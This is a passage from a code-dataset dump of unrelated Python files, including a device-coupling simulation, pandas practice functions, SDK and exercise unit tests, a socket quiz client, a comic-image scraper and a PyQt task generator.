reject_clients, runtime):\n accept_clients = list(accept_clients)\n reject_clients = list(reject_clients)\n groundtruth_accept_clients = [client.factory.get_mac() for client in clients if client.coupling_groundtruth]\n groundtruth_reject_clients = [client.factory.get_mac() for client in clients if not client.coupling_groundtruth]\n return StaticCouplingResult(accept_clients, reject_clients,\n groundtruth_accept_clients, groundtruth_reject_clients,\n runtime, mac_mapping)\n\ndef stop_reactor_callback():\n logging.info(\"stop reactor\")\n reactor.stop()\n \ndef get_mac(identifier):\n if identifier not in mac_mapping:\n mac_mapping[identifier] = create_random_mac()\n for client in clients:\n if client.factory.transport:\n remote = client.factory.transport.getHost()\n if identifier == remote.host or identifier == remote.port:\n client.factory.set_mac(mac_mapping[identifier])\n break\n return mac_mapping[identifier]\n\ndef run(parameter):\n access_point = AccessPoint()\n access_point.deny_hosts = MagicMock()\n access_point.get_mac = MagicMock(side_effect=get_mac)\n access_point.get_num_connected_clients = MagicMock(return_value=parameter.num_clients)\n localization_pos_in_iter = cycle(parameter.localization_pos_in_area)\n localization_pos_out_iter = cycle(parameter.localization_pos_out_area)\n \n for _ in range(parameter.num_clients-parameter.num_reject_clients): # accept client\n localization_pos_in = next(localization_pos_in_iter)\n coupling_data_provider = CouplingDataProvider(parameter.light_signal, parameter.light_signal_time,\n parameter.wifi_scans[localization_pos_in],\n parameter.ble_scans[localization_pos_in])\n clients.append(ClientController(parameter.server_ip, parameter.server_port,\n coupling_data_provider, True))\n \n datalen = len(parameter.light_signal)\n mean = parameter.light_signal.mean()\n std = parameter.light_signal.std()\n #light_signal_random, light_signal_random_time = light_analysis.load_random_light_signal()\n for _ in range(parameter.num_reject_clients): # reject client\n localization_pos_out = next(localization_pos_out_iter)\n light_signal_random = numpy.random.normal(mean, std, datalen)\n #coupling_data_provider = CouplingDataProvider(light_signal_random, light_signal_random_time,\n # parameter.wifi_scans[localization_pos_out], \n # parameter.ble_scans[localization_pos_out])\n coupling_data_provider = CouplingDataProvider(light_signal_random, parameter.light_signal_time,\n parameter.wifi_scans[localization_pos_out], \n parameter.ble_scans[localization_pos_out])\n clients.append(ClientController(parameter.server_ip, parameter.server_port,\n coupling_data_provider, False))\n \n server = ServerController(parameter.server_port, access_point,\n parameter.data_period_coupling, parameter.coupling_compare_method,\n parameter.coupling_similarity_threshold, parameter.equalize_method,\n parameter.data_period_localization, parameter.localization_pos_in_area,\n parameter.localization_pos_out_area, parameter.path_wifi_scans, parameter.path_ble_scans,\n parameter.coupling_classifier_basic_all_features,\n parameter.coupling_classifier_basic_selected_features,\n parameter.coupling_classifier_tsfresh_all_features,\n parameter.coupling_classifier_tsfresh_selected_features,\n parameter.tsfresh_features_to_extract_all, parameter.tsfresh_features_to_extract_selected,\n evaluate_callback, stop_reactor_callback)\n server.start()\n for client in clients:\n client.start()\n logging.info(\"run server and clients\")\n reactor.run()\n \ndef test():\n testbed = \"vm\" # server, vm\n server_ip = \"localhost\"\n server_port = 1026\n num_clients = 10\n num_reject_clients = 0\n len_light_pattern = 8\n data_period_coupling = 0.07\n coupling_compare_method = \"pearson\"\n coupling_similarity_threshold = 0.7\n equalize_method = \"dtw\"\n data_period_ml_train = 0.05\n coupling_ml_classifier = \"Random Forest\"\n path_ml_train_data = os.path.join(__location__, \"..\", \"ml-train-data\", testbed)\n data_period_localization = 5\n localization_pos_in_area = str(coupling_simulator.localization_pos_in_area)\n fingerprint_directory = os.path.join(__location__, \"..\", \"..\", \"localization\", \"data\")\n path_wifi_scans = os.path.join(fingerprint_directory, \"wifi-fingerprints\")\n path_ble_scans = os.path.join(fingerprint_directory, \"bluetooth-fingerprints\")\n parameter = SimulationData(server_ip, server_port,\n num_clients, num_reject_clients, len_light_pattern,\n data_period_coupling, coupling_compare_method, coupling_similarity_threshold, equalize_method,\n data_period_ml_train, path_ml_train_data, coupling_ml_classifier,\n data_period_localization, localization_pos_in_area, path_wifi_scans, path_ble_scans)\n run(parameter)\n \ndef evaluation():\n parameter = SimulationData(sys.argv[1], sys.argv[2], sys.argv[3],\n sys.argv[4], sys.argv[5], sys.argv[6],\n sys.argv[7], sys.argv[8], sys.argv[9],\n sys.argv[10], sys.argv[11], sys.argv[12],\n sys.argv[13], sys.argv[14], sys.argv[15],\n sys.argv[16])\n run(parameter)\n \nif __name__ == \"__main__\":\n logging.basicConfig(filename=\"static-coupling-simulation.log\", level=logging.DEBUG)\n #test()\n evaluation()\n ","sub_path":"device-association/device_grouping/online/static/coupling_simulation_round.py","file_name":"coupling_simulation_round.py","file_ext":"py","file_size_in_byte":14409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"131641091","text":"from terra_sdk.core.oracle import MsgAggregateExchangeRateVote, MsgDelegateFeedConsent\n\n\ndef test_deserializes_msg_delegate_feed_consent_examples(load_msg_examples):\n examples = load_msg_examples(\n MsgDelegateFeedConsent.type, \"./MsgDelegateFeedConsent.data.json\"\n )\n for example in examples:\n assert MsgDelegateFeedConsent.from_data(example).to_data() == example\n\n\ndef test_msg_aggregate_exchange_rate_vote_get_aggregate_vote_hash(load_msg_examples):\n msg = MsgAggregateExchangeRateVote(\n {\n \"ukrw\": \"245.000\",\n \"uusd\": \"0.2242\",\n \"usdr\": \"0.182\",\n },\n \"salt\",\n \"terra1krj7amhhagjnyg2tkkuh6l0550y733jnjulzjh\",\n \"terravaloper1krj7amhhagjnyg2tkkuh6l0550y733jnjnnlzy\",\n )\n\n assert (\n msg.get_aggregate_prevote().hash == \"7929908433e7399845fa60f9ef70ef7f2bb8f01b\"\n )\n","sub_path":"tests/core/oracle/msgs_test.py","file_name":"msgs_test.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"470622064","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 9 10:18:45 2017\n\nMostly from here:\nhttps://pandas.pydata.org/pandas-docs/stable/groupby.html\n\n\"\"\"\n\nimport pandas as pd\nimport math\nimport numpy as np\nimport timeit\n\ndef RMSEsubGroup(df):\n \n# print(len(df))\n \n# print(df['error'].apply(lambda x : x**2))\n\n \n# subRMSE = math.sqrt(((df['error'].apply(lambda x : x**2)).sum())/float(len(df)))\n subRMSE = np.sqrt(((df['error'].apply(lambda x : x**2)).sum())/float(len(df)))\n\n print('subRMSE : ', subRMSE )\n \n \ndef PandasGroupByExample():\n df = pd.read_csv('dummyshort.csv')\n \n print('df: ', df.head())\n \n \n grouped = df.groupby('UniqueClipID')\n \n print(grouped)\n print()\n print(grouped.groups)\n \n \n grouped.sum()\n \n print()\n \n # Iterate through groups \n for name, group in grouped:\n print('\\nGroup name: ', name)\n print('Group: ',group)\n # print(group['error'])\n RMSEsubGroup(group)\n \n return\n\n \ndef PandasGroupByExample_TwoStageGrouping():\n# df = pd.read_csv('dummyshort.csv')\n df = pd.read_csv('dummyshort2.csv')\n \n print('df: ', df.head())\n \n uniqProc = df['process_point'].unique()\n print('uniqProc : ', uniqProc )\n print('len(uniqProc) : ', len(uniqProc) )\n \n grouped = df.groupby(['UniqueClipID', 'process_point'])\n \n print('grouped: ', grouped)\n print()\n print('grouped.groups: ', grouped.groups)\n print('\\nKeys for grouped.groups: ', grouped.groups.keys())\n \n \n grouped.sum()\n \n print()\n \n # Iterate through groups \n for keys, group in grouped:\n print('\\nGroup keys: {} clipno: {} procPoint: {}'.format(keys, keys[0], keys[1]))\n# print('Group: ',group)\n # print(group['error'])\n RMSEsubGroup(group)\n\n # Same thing with enumerate \n for idx, (keys, group) in enumerate(grouped):\n print('\\nidx: {} Group keys: {} clipno: {} procPoint: {}'.format(idx, keys, keys[0], keys[1]))\n RMSEsubGroup(group) \n \n return\n\n\ndef PandasMergeTwoFilesExammple():\n \n df1 = pd.read_csv('bbox_all_avg.withGaugeClip.txt')\n print('df1.columns: ', df1.columns)\n \n df2 = pd.read_csv('uniqueClipRMSE.csv')\n print('df2.columns: ', df2.columns)\n \n# df3 = pd.concat([df1, df2])\n df3 = pd.merge(df1, df2, how='inner', on='UniqueClipID')\n \n print('df3.head=', df3.head())\n print('len(df1) = ', len(df1))\n print('len(df2) = ', len(df2))\n print('len(df3) = ', len(df3))\n\ndef TestGeneratorWithFileReading_NoGenerator():\n \n fin = open('bbox_all_avg.withGaugeClip.txt', 'r')\n lines = fin.readlines()\n fin.close()\n\n bbox = list()\n for line in lines: \n bbox.append(line)\n\n # TODO Instead of returning list, return \"generator\"\n return bbox \n \ndef TestGeneratorWithFileReading_WithGenerator():\n \n fin = open('bbox_all_avg.withGaugeClip.txt', 'r')\n lines = fin.readlines()\n fin.close()\n\n# bbox = list()\n for line in lines[1:]: \n# bbox.append(line)\n yield line\n # TODO Instead of returning list, return \"generator\"\n \ndef SpeedTestForGeneratorvsListReturns():\n \n bbox = TestGeneratorWithFileReading_NoGenerator()\n print('\\nlen(bbox): ', len(bbox))\n \n bbox1 = TestGeneratorWithFileReading_WithGenerator()\n print('\\nlen(bbox1): ', bbox1)\n \n \n print('With generator:', timeit.timeit(\"TestGeneratorWithFileReading_WithGenerator()\", setup=\"from __main__ import TestGeneratorWithFileReading_WithGenerator\"))\n# print('No generator:', timeit.timeit(\"TestGeneratorWithFileReading_NoGenerator()\", setup=\"from __main__ import TestGeneratorWithFileReading_NoGenerator\"))\n\n return \n \ndef PandasJoiningWthMultiIndex():\n \n dfmerged = pd.read_csv('debug.dfmerged.csv')\n dfunique = pd.read_csv('debug.intermediate.unique.csv')\n \n# dfunique = dfunique.set_index(['UniqueClipID', 'UniqueClipName'])\n \n dfunique = dfunique.set_index(['xmin', 'xmax', 'ymin', 'ymax', 'GAUGE', 'UniqueClipID',\n 'UniqueClipName', 'process_point', 'AutoModelRMSE', 'RefModelRMSE'])\n \n print('len(dfmerged)):', len(dfmerged))\n print('len(dfunique)):', len(dfunique))\n \n print('dfmerged: \\n', dfmerged.head(2)) \n print('\\ndfunique: \\n', dfunique.head(2)) \n \n# dfjoined = dfmerged.join(dfunique, lsuffix='_left', rsuffix='_right',\n# on=['UniqueClipID', 'UniqueClipName'])\n dfjoined = dfmerged.join(dfunique, lsuffix='_left', rsuffix='_right',\n on=['xmin', 'xmax', 'ymin', 'ymax', 'GAUGE', 'UniqueClipID',\n 'UniqueClipName', 'process_point', 'AutoModelRMSE', 'RefModelRMSE'])\n \n\n print('\\ndfjoined: \\n', dfjoined.head(2)) \n print('\\ndfjoined.columns: \\n', dfjoined.columns) \n print('len(dfjoined): \\n', len(dfjoined)) \n \n\ndef main():\n\n# PandasGroupByExample()\n \n# PandasGroupByExample_TwoStageGrouping()\n \n# PandasMergeTwoFilesExammple()\n \n# SpeedTestForGeneratorvsListReturns()\n\n PandasJoiningWthMultiIndex()\n \n \nif __name__ == '__main__':\n\n# print('No generator:', timeit.timeit(\"TestGeneratorWithFileReading_NoGenerator()\", setup=\"from __main__ import TestGeneratorWithFileReading_NoGenerator\")\n\n \n main()","sub_path":"misc/pandasgroupbytest.py","file_name":"pandasgroupbytest.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"567023271","text":"import random\nimport string\n\nimport pytest\nimport exam\n\n# input string\n# output dict where key is int and value is list of symbols that appeared that many times in the string\n\n\ndef assert_solution(word):\n answer = exam.count_symbol_appearances_2(word)\n print(answer)\n symbol_set = set(word)\n quantity_list = []\n for symbol in symbol_set:\n quantity_list.append(word.count(symbol))\n if symbol not in answer[word.count(symbol)]: # if symbol is not where expected\n return False\n if len(answer.keys()) != len(set(quantity_list)): # if there are extra dictionary keys\n return False\n values = [item for sublist in list(answer.values()) for item in sublist]\n if len(values) != len(set(values)) or set(values) != symbol_set: # if there are repeat values or extra values\n return False\n return True\n\n\n@pytest.mark.timeout(1.0)\ndef test_count_symbol_appearances_2_01():\n # all different\n assert assert_solution(\"1\") # {1: [\"1\"]\n assert assert_solution(\"abc\") # {1: [\"a\", \"b\", \"c\"]}\n\n\n@pytest.mark.timeout(1.0)\ndef test_count_symbol_appearances_2_02():\n # all same\n assert assert_solution(\"1111\") # {4: [\"1\"]}\n assert assert_solution(\" \") # {6: [\" \"]}\n\n\n@pytest.mark.timeout(1.0)\ndef test_count_symbol_appearances_2_03():\n # various\n assert assert_solution(\"abba\") # {2: [\"a\", \"b\"]}\n assert assert_solution(\"AaAaAAAAa \") # {1: [\" \"], 3: [\"a\"], 6: [\"A\"]}\n\n\n@pytest.mark.timeout(1.0)\ndef test_count_symbol_appearances_2_04():\n # empty string\n assert assert_solution(\"\") # {}\n\n\n@pytest.mark.timeout(5.0)\ndef test_count_symbol_appearances_2_05():\n # random\n for _ in range(100):\n assert assert_solution(\"\".join(random.choices(string.ascii_letters, k=random.randint(0, 100))))\n","sub_path":"week-3/test_count_symbol_appearances_2.py","file_name":"test_count_symbol_appearances_2.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"229019017","text":"# Copyright (c) 2013 Mirantis Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport sys\n\nfrom git_review import tests\nfrom git_review.tests import utils\n\n\ndef list_test_ids(argv):\n res = utils.run_cmd(sys.executable, '-m', 'testtools.run', *argv[1:])\n return res.split('\\n')\n\n\ndef find_collisions(test_ids):\n hashes = {}\n for test_id in test_ids:\n hash_ = tests._hash_test_id(test_id)\n if hash_ in hashes:\n return (hashes[hash_], test_id)\n hashes[hash_] = test_id\n return None\n\n\ndef main(argv):\n test_ids = list_test_ids(argv)\n if not test_ids:\n print(\"No tests found, check command line arguments\", file=sys.stderr)\n return 1\n collision = find_collisions(test_ids)\n if collision is None:\n return 0\n print(\n \"Found a collision for test ids hash function: %s and %s\\n\"\n \"You should change _hash_test_id function in\"\n \" git_review/tests/__init__.py module to fit new set of test ids.\"\n % collision,\n file=sys.stderr,\n )\n return 2\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","sub_path":"git_review/tests/check_test_id_hashes.py","file_name":"check_test_id_hashes.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"235874041","text":"# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Backend service.\"\"\"\n\nimport urlparse\n\nfrom googlecloudsdk.api_lib.compute import request_helper\nfrom googlecloudsdk.api_lib.compute import utils\nfrom googlecloudsdk.core import apis as core_apis\n\n\ndef GetBatchUrl(endpoint_url):\n \"\"\"Return a batch URL for the given endpoint URL.\"\"\"\n parsed_endpoint = urlparse.urlparse(endpoint_url)\n return urlparse.urljoin(\n '{0}://{1}'.format(parsed_endpoint.scheme, parsed_endpoint.netloc),\n 'batch')\n\n\nclass ClientAdapter(object):\n \"\"\"Encapsulates compute apitools interactions.\"\"\"\n _API_NAME = 'compute'\n\n def __init__(self, api_default_version='v1'):\n self._api_version = core_apis.ResolveVersion(\n self._API_NAME, api_default_version)\n self._client = core_apis.GetClientInstance(\n self._API_NAME, self._api_version)\n\n # Turn the endpoint into just the host.\n # eg. https://www.googleapis.com/compute/v1 -> https://www.googleapis.com\n endpoint_url = core_apis.GetEffectiveApiEndpoint(\n self._API_NAME, self._api_version)\n self._batch_url = GetBatchUrl(endpoint_url)\n\n @property\n def api_version(self):\n return self._api_version\n\n @property\n def apitools_client(self):\n return self._client\n\n @property\n def batch_url(self):\n return self._batch_url\n\n @property\n def messages(self):\n return self._client.MESSAGES_MODULE\n\n def MakeRequests(self, requests, errors_to_collect=None):\n \"\"\"Sends given request in batch mode.\"\"\"\n errors = errors_to_collect if errors_to_collect is not None else []\n objects = list(request_helper.MakeRequests(\n requests=requests,\n http=self._client.http,\n batch_url=self._batch_url,\n errors=errors,\n custom_get_requests=None))\n if errors_to_collect is None and errors:\n utils.RaiseToolException(\n errors, error_message='Could not fetch resource:')\n return objects\n\n","sub_path":"files/usr/google-cloud-sdk/lib/googlecloudsdk/api_lib/compute/client_adapter.py","file_name":"client_adapter.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"63630262","text":"import os\nimport pygame\nfrom map_creator import *\nfrom constant import *\nfrom pygame.locals import *\n\ndef main():\n pygame.init()\n window = pygame.display.set_mode((WIDTH, HEIGHT), RESIZABLE)\n init_map(window)\n end_program = False\n while end_program == False:\n for event in pygame.event.get():\n pygame.display.flip()\n if event.type == QUIT:\n end_program = True\n return (0)\n\nmain();\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"179252919","text":"import unittest\nfrom ..utils.getters import with_getters_for\n\nclass TestWithGettersFor(unittest.TestCase):\n def test_should_add_getters_to_the_given_class_for_the_given_var_names(self):\n class MyClass(object):\n def __init__(self, foo, bar):\n self.foo = foo\n self.bar = bar\n with_getters_for(MyClass, 'foo', 'bar')\n \n foo = 'foo_var'\n bar = 'bar_var'\n\n clazz = MyClass(foo, bar)\n self.assertEquals(foo, clazz.get_foo(), \"Should have a getter for foo\")\n self.assertEquals(bar, clazz.get_bar(), \"Should have a getter for bar\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"assignment2/src/photogallery/tests/getters_test.py","file_name":"getters_test.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"398375686","text":"import socket\nimport threading\nimport sys\nimport pickle\nimport json\nfrom PyQt5.QtCore import QThread\n\nHOST = \"0.0.0.0\"\nPORT = 8080\n\nclass Usuario:\n def __init__(self, name, score=0):\n self.name = name\n self.score = score\n\nclass Cliente:\n def __init__(self, usuario, host, port):\n print(\"Inicializando cliente...\")\n\n self.usuario = usuario\n self.usr_cls = None\n self.host = host\n self.port = port\n self.socket_cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.categorias = list()\n self.categorias_r = False\n\n try:\n self.connect_to_server()\n # self.recibidor = threading.Thread(target=self.recibir_mensajes, args=())\n # self.recibidor.daemon = True\n self.listen()\n self._isalive = True\n\n except:\n print(\"Conexión terminada\")\n self.socket_cliente.close()\n exit()\n\n def connect_to_server(self):\n self.socket_cliente.connect((self.host, self.port))\n\n def listen(self):\n thread = threading.Thread(target=self.listen_thread, daemon=True)\n thread.start()\n\n def listen_thread(self):\n # self.nombrar()\n while True:\n response_bytes_length = self.socket_cliente.recv(2)\n response_length = int.from_bytes(response_bytes_length, byteorder=\"big\")\n\n if response_length == 10:\n self.crear_usuario()\n\n if response_length == 1:\n self.recibir_categorias()\n\n if response_length == 2:\n self.recibir_mensajes()\n\n def recibir_mensajes(self):\n while self._isalive:\n response_bytes_length = self.socket_cliente.recv(4)\n response_length = int.from_bytes(response_bytes_length, byteorder=\"big\")\n response = b\"\"\n\n # Recibimos datos hasta que alcancemos la totalidad de los datos\n # indicados en los primeros 4 bytes recibidos.\n response += self.socket_cliente.recv(response_length)\n\n decoded = response.decode()\n msg = json.loads(decoded)\n self.recibido = msg\n\n # print('{}: {}'.format(msg['user'], msg['content']))\n\n\n # El método send() enviará mensajes al servidor. Implementa el mismo\n # protocolo de comunicación que mencionamos, es decir, agregar 4 bytes\n # al principio de cada mensaje indicando el largo del mensaje enviado.\n def send(self, msg):\n msg_bytes = msg.encode()\n msg_length = len(msg_bytes).to_bytes(4, byteorder=\"big\")\n self.socket_cliente.send(msg_length + msg_bytes)\n\n\n def nombrar(self):\n señal = 10\n self.socket_cliente.send(señal.to_bytes(1, byteorder='big')\n + len(self.usuario).to_bytes(2, byteorder='big')\n + self.usuario.encode())\n\n def crear_usuario(self):\n tamaño = int.from_bytes(self.socket_cliente.recv(2), byteorder='big')\n obj = b\"\"\n\n obj += self.socket_cliente.recv(tamaño)\n a = obj.decode()\n dict = json.loads(a)\n self.usr_cls = Usuario(dict['name'], dict['score'])\n self.pedir_categorias()\n print(self.usr_cls.name)\n return self.usr_cls\n\n def actualizar_usuario(self):\n señal = 9\n self.socket_cliente.send(señal.to_bytes(1, byteorder='big')\n + len(self.usuario).to_bytes(2, byteorder='big')\n + pickle.dumps(self.usuario))\n\n def pedir_categorias(self):\n señal = 1\n self.socket_cliente.send(señal.to_bytes(1, byteorder='big'))\n\n def recibir_categorias(self):\n response_bytes_length = self.socket_cliente.recv(4)\n response_length = int.from_bytes(response_bytes_length, byteorder=\"big\")\n\n if response_length == 111:\n self.categorias_r = True\n return self\n\n response = b\"\"\n\n response += self.socket_cliente.recv(response_length)\n\n genero = response.decode()\n self.categorias.append(genero)\n\n\n\nif __name__ == '__main__':\n\n usuario = \"usuario\"\n client = Cliente(usuario, HOST, PORT)\n\n #while True:\n # pass\n","sub_path":"Tareas/T06/client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"530470749","text":"import re\nimport os\nimport sys\nimport time\nimport requests\nimport random\nfrom name_list import NAME\nfrom fileoperate import *\n\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))\n\n\n# 随机选择一个user_agent\nuser_agent_list = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3',\n 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',\n 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',\n 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',\n 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',\n]\nuser_agent = random.choice(user_agent_list)\n\n# 传递给header\nheaders = { 'User-Agent': user_agent }\n\n\ndef myRequests(url):\n \"\"\"\n 获取对应请求的URL\n 设置对应的操作,在请求失败时确保重新发送\n params:\n url:请求地址\n \"\"\"\n try:\n response = requests.get(url,headers=headers)\n except Exception as e:\n time.sleep(10)\n try:\n response = requests.get(url, headers=headers)\n except Exception as e:\n time.sleep(10)\n response = requests.get(url, headers=headers)\n sys.exit(1)\n return response\n\n\ndef get_chapter_url_list(url):\n \"\"\"\n 获取章节链接地址\n params:\n url:漫画目录地址\n return:\n name_list:章节地址列表\n \"\"\"\n response = myRequests(url)\n html = response.text\n name_list = re.findall(r'/comic/7580/\\d{4,11}.html', html)\n for i in range(0,len(name_list)):\n name_list[i] = \"https://www.manhuagui.com\" + name_list[i]\n time.sleep(1)\n return name_list\n\n\ndef create_comic_dir(dirname):\n \"\"\"\n 创建漫画文件夹\n params:\n dirname:文件夹名称\n return:\n dir_name:文件路径\n \"\"\"\n path = os.path.dirname(__file__)\n comic_dir = os.path.join(path, \"comic\")\n dir_name = os.path.join(comic_dir, dirname)\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n print(dir_name)\n return dir_name\n\n\ndef get_chapter_comic(chapter_url,pic_num,dir_name):\n \"\"\"\n 下载对应章节图片\n params:\n chapter_url:对应的章节链接\n pic_num:图片编号,本章图片的起始编号\n \"\"\"\n time.sleep(1)\n response = myRequests(chapter_url)\n html = response.text\n name_list = re.findall(r'https://pic.muamh.com/static/upload/book/.{7,30}.jpg', html)\n while(len(name_list) == 0):\n response = myRequests(chapter_url)\n html = response.text\n name_list = re.findall(r'https://pic.muamh.com/static/upload/book/.{7,30}.jpg', html)\n print(name_list)\n for name in name_list:\n pic_num += 1\n num = \"%04d.jpg\"%pic_num\n filename = os.path.join(dir_name,num)\n download_comic_jpg(name,filename)\n return pic_num\n\n\ndef download_comic_jpg(comic_url, filename):\n \"\"\"\n 下载对应图片\n params:\n comic_url:漫画图片地址\n filename:存储图片的地址\n return:\n \"\"\"\n response = myRequests(comic_url)\n print(filename)\n time.sleep(0.5)\n with open(filename,'wb') as f:\n f.write(response.content)\n\n\ndef start_download(chapter_url_list,dir_name,cstart=1,pstart=0):\n \"\"\"\n 下载对应章节列表的漫画\n params:\n chapter_url_list:章节链接\n dir_name:漫画文件夹地址\n cstart:起始章节,base=0\n pstart:当前漫画图片编号\n \"\"\"\n current_chapter = cstart -1\n pic_start = pstart\n for name in chapter_url_list[cstart:]:\n current_chapter += 1\n print(name,\"chapter\",current_chapter)\n # pic_start = get_chapter_comic(name, pic_start,dir_name)\n\ndef run_exe(comic_dir,dir_url):\n dirName= create_comic_dir(comic_dir)\n chapter_list = get_chapter_url_list(dir_url)\n print(len(chapter_list),chapter_list)\n start_download(chapter_list,dirName,1,0)\n\ndef get_comic_list_by_page(page=1):\n \"\"\"\n 获取漫画名称列表\n \"\"\"\n current_page = page\n name_set = set()\n url = \"\"\n for i in range(current_page,24):\n url = \"https://www.5wmh.com/booklist?page={}&tag=%E5%89%A7%E6%83%85&area=-1&end=-1\".format(i)\n print(url)\n response = myRequests(url)\n html = response.text\n name_list = re.findall('href=\"(https://www.5wmh.com/book/.{4,8}).html\" title=\"(.{2,15})\"', html)\n for name in name_list:\n if \" 0) else randint(1, math.ceil(ans) + 3)\n print(math.ceil(min))\n print(math.ceil(ans + 10))\n pass\n radio = QRadioButton(round(str(randint(math.ceil(min), math.ceil(ans + 10)) * (randint(40, 60) / 50 if not isDigit else 1))))\n else:\n radio = QRadioButton(self.tasks[i][1])\n\n radios.append(radio)\n\n groupVBoxLayout.addWidget(radio)\n\n self.groupBoxes[i].setLayout(groupVBoxLayout)\n\n if not self.isTesting:\n self.lines_edit.append(line_edit)\n self.user_answers.append(self.lines_edit[i].text())\n else:\n self.lines_edit.append(self.groupBoxes[i])\n\n self.all_radios.append(radios)\n\n\n # line_edit.textEdited.connect(lambda text: self.set_style_line_edit(line_edit, 'black'))\n\n\n # self.tasks.append(generate_task(self))\n problem_text = (str(i + 1) + '. ' if len(self.tasks) > 1 else ' ') + self.tasks[i][0]\n problem = QLabel(problem_text, self)\n\n problem.setFont(QFont('SansSerif', 14))\n\n # grid.addWidget(problem, 2 * i, 0)\n vbox.addWidget(problem)\n\n if self.theme == 'Графы' and self.difficulty == 3:\n layout = QVBoxLayout()\n pixmap = QPixmap('path_graph_cities.png')\n\n lbl = QLabel(self)\n lbl.setPixmap(pixmap)\n\n layout.addWidget(lbl)\n\n vbox_widget = QWidget()\n vbox_widget.setLayout(layout)\n\n vbox.addWidget(vbox_widget)\n\n # grid.setSpacing(50)\\\n hbox = QHBoxLayout()\n\n self.results.append(QLabel())\n\n hbox.addWidget(self.lines_edit[i])\n\n hbox.addWidget(self.results[i])\n hbox.addStretch(1)\n\n hbox_widget = QWidget()\n hbox_widget.setLayout(hbox)\n\n self.grids.append(hbox)\n\n if self.tasks[i][1]:\n vbox.addWidget(hbox_widget)\n\n\n\n pdf.output(\"Задачи.pdf\")\n\n # self.generate_tasks_from_pattern()\n\n vbox.addWidget(QLabel(' ' * 130))\n\n self.grids.append(vbox)\n\n self.result = QLabel()\n self.result.setStyleSheet('color: #383396;'\n 'font: bold large \"Times New Roman\";'\n 'font-size: 19pt;'\n )\n\n vbox.addWidget(self.result)\n\n vbox.addStretch(30)\n\n self.hbox.addWidget(clean_button)\n self.hbox.addWidget(testing_mode_button)\n self.hbox.addStretch(30)\n self.hbox.addWidget(answer_button)\n\n self.hbox.addStretch(1)\n self.hbox.addWidget(check_button)\n\n vbox_widget = QWidget()\n vbox_widget.setLayout(vbox)\n\n scroll_area = QScrollArea()\n scroll_area.setWidget(vbox_widget)\n\n scroll_area.setWidgetResizable(False)\n scroll_area.setFrameStyle(QFrame.NoFrame)\n\n error_label = QLabel('Не найдено подходящих задач!')\n error_label.setFont(QFont('', 22))\n error_label.setStyleSheet('qproperty-alignment: AlignCenter;'\n 'color: #f44b42;'\n 'font: bold large \"Times New Roman\";'\n ''\n )\n\n self.vbox.addWidget(title_label)\n\n if not 